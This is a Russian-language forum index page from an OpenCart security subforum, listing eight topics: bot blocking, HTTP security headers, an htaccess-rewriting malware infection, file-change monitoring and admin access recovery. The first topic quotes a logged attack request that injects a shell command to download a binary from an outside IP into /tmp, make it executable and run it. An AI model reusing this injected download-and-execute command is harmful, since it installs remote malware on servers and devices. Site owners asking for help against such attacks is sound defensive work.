Перейти к содержанию
  • RU
    • Язык

Вопросы по Безопасности OpenCart

Вопросы обеспечения безопасности сайтов и всё, что с этим связано

Правила раздела

Общайтесь с людьми на форуме так, как вы разговаривали бы с ними в реальной жизни. В повседневном общении мы демонстрируем воспитанность, степенность и солидность. Берите пример с самих себя и при виртуальном общении.

Помните, вы находитесь на тематическом форуме, старайтесь руководствоваться нормами поведения, которые приняты в деловой среде. Посылайте простые и ясные сообщения, которые понятны всем участникам диалога. Придерживайтесь тематики топика и задавайте вопросы по делу.

Не бойтесь быть дружелюбным и общительным, пользуйтесь возможностями неформальной обстановки, высказывайтесь доброжелательно и спокойно. Вы можете воздействовать на обстановку и людей, создавая тем самым приятную атмосферу на форуме.

Если вам не нравятся собеседники в теме общения или обстановка, которая в ней сложилась, не стоит писать сообщения, изобличающие людей, которые вас не устраивают. Каждый из вас может просто покинуть топик и исключить неприятности из своей жизни.

Чего следует сторониться:

  • не нормативная лексика - табу на подавляющем большинстве форумов и этот не исключение,
  • оскорбления - помните, что каждое слово может быть использовано против вас,
  • угрозы - а подобные сообщения преследуются по закону!

Руководствуясь этими простыми правилами, вы сможете избежать бессмысленных разногласий и добиться конструктивного общения, а также скорейшего решения вашего вопроса или возникшей проблемы.

В форуме 8 тем

  1. Rashp

    Попытки загрузить шелл в /tmp

    от Rashp

    Всем здравствуйте, после переезда на новые сервера, столкнулся по странными запросами вот такого вида: /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) пытаются грузить на сервер shell и получить доступ к сайту, стандартные методы борьбы не особо помогают, менял права на /tmp на 755, 775, но сайт падает на 500, где сайт и /tmp могут быть связаны и как можно купировать эту проблему?

    Rashp
    Последний ответ от Rashp,
    0

    Баллы репутации

  2. Rashp

    Нашествие поведенческих ботов

    от Rashp

    Всем здравствуйте, Кто-нибудь настраивал защиту от поведенческих ботов? Задолбали боты Biterika LLC, уже многое перепробовал, у меня есть настройка nginx - blackips, но мне кажется это полная шляпа и на работу движка как-то не хорошо влияет. Ставил какой-то г*в#* модуль Messor, тоже полная фигня. Кто-то настраивал блокировку по ASN не через cloudflare (не безопасно это сейчас настраивать). Или есть еще какие нибудь методы борьбы?

    Rashp
    Последний ответ от Rashp,
    0

    Баллы репутации

  3. Niga

    Заголовки безопасности HTTP Headers в .htaccess ocStore 2.3

    от Niga

    Здравствуйте, прописал наконец-то заголовки безопасности HTTP Headers в .htaccess на ocStore 2.3, и вроде сервисы показывают, что все правильно, но не покидает чувство, что что-то не так сделано))) веб сервис на связке nginx+Apache ocStore 2.3, может кто подскажет, все ли верно или может что поправить нужно или дописать? # Заголовки безопасности Header always unset X-Powered-By Header unset X-Powered-By <IfModule mod_headers.c> Header always set Strict-Transport-Security "max-age=31536000" env=HTTPS Header always set Content-Security-Policy "upgrade-insecure-requests" Header always set X-Content-Type-Options "nosniff" Header always set X-XSS-Protection "1…

    Niga
    Последний ответ от Niga,
    0

    Баллы репутации

  4. Nash

    Вирус постоянно генерит htaccess

    от Nash

    Добрый день! словил на одном из сайтов на ocstore 2.3 такую вирусню: - затирается главный файл .htaccess и в код главной страницы index.php в начало добавляется вредоносный код; - при попытке изменения .htaccess или index.php, они буквально через секунду снова перезатирались; - во ВСЕХ директориях сайта, который был основным зараженным, создались файлы .htaccess, запрещающие вам доступ чезер браузер к директориям; - создаются файлы в директориях сайта с вредоносным кодом и рандомным названием; - иногда встраивается вредоносный код в файлы; в логах обнаружил вот такое: Apr 16 04:22:07 vh320 apache_access[10209]: WWWSITE.com 194.87.218.48 - - [16/Apr/2023:0…

    halfhope
    Последний ответ от halfhope,
    0

    Баллы репутации

  5. tamweb

    Какой лучше поставить Крон скрипт, присылающий на почту изменения времени модификации и появления новых файлов?

    от tamweb

    Ребята, подскажите какой лучше поставить Крон скрипт, присылающий на почту изменения времени модификации и появления новых файлов любых php,tpl,js Хочу поставить на сайт, как защиту от взлома сайта.

    Tom
    Последний ответ от Tom,
    2

    Баллы репутации

  6. tamweb

    Подскажите актуальный чек лист для защиты сайта, админки сайта от взлома

    от tamweb

    Всем привет, подскажите актуальный чек лист для защиты сайта, админки сайта от взлома. Сайт на Opencart

    AlexDW
    Последний ответ от AlexDW,
    1

    Баллы репутации

  7. Maria-940V

    Как восстановить доступ в админку?

    от Maria-940V

    Доброго времени суток. Пожалуйста ребят, помогите восстановить доступ в админку магазина, Не могу понять почему не пускает в админку, боюсь как бы нас не взломали.. Помогите пожалуйста! Заранее вам благодарна!

    greendaytoday
    Последний ответ от greendaytoday,
    9

    Баллы репутации

  8. Aleksandr-krot76

    как установить ssl сертификат на сайт opencart?

    от Aleksandr-krot76

    Собственно вопрос в заголовке.

    Tom
    Последний ответ от Tom,
    0

    Баллы репутации

×
×
  • Создать...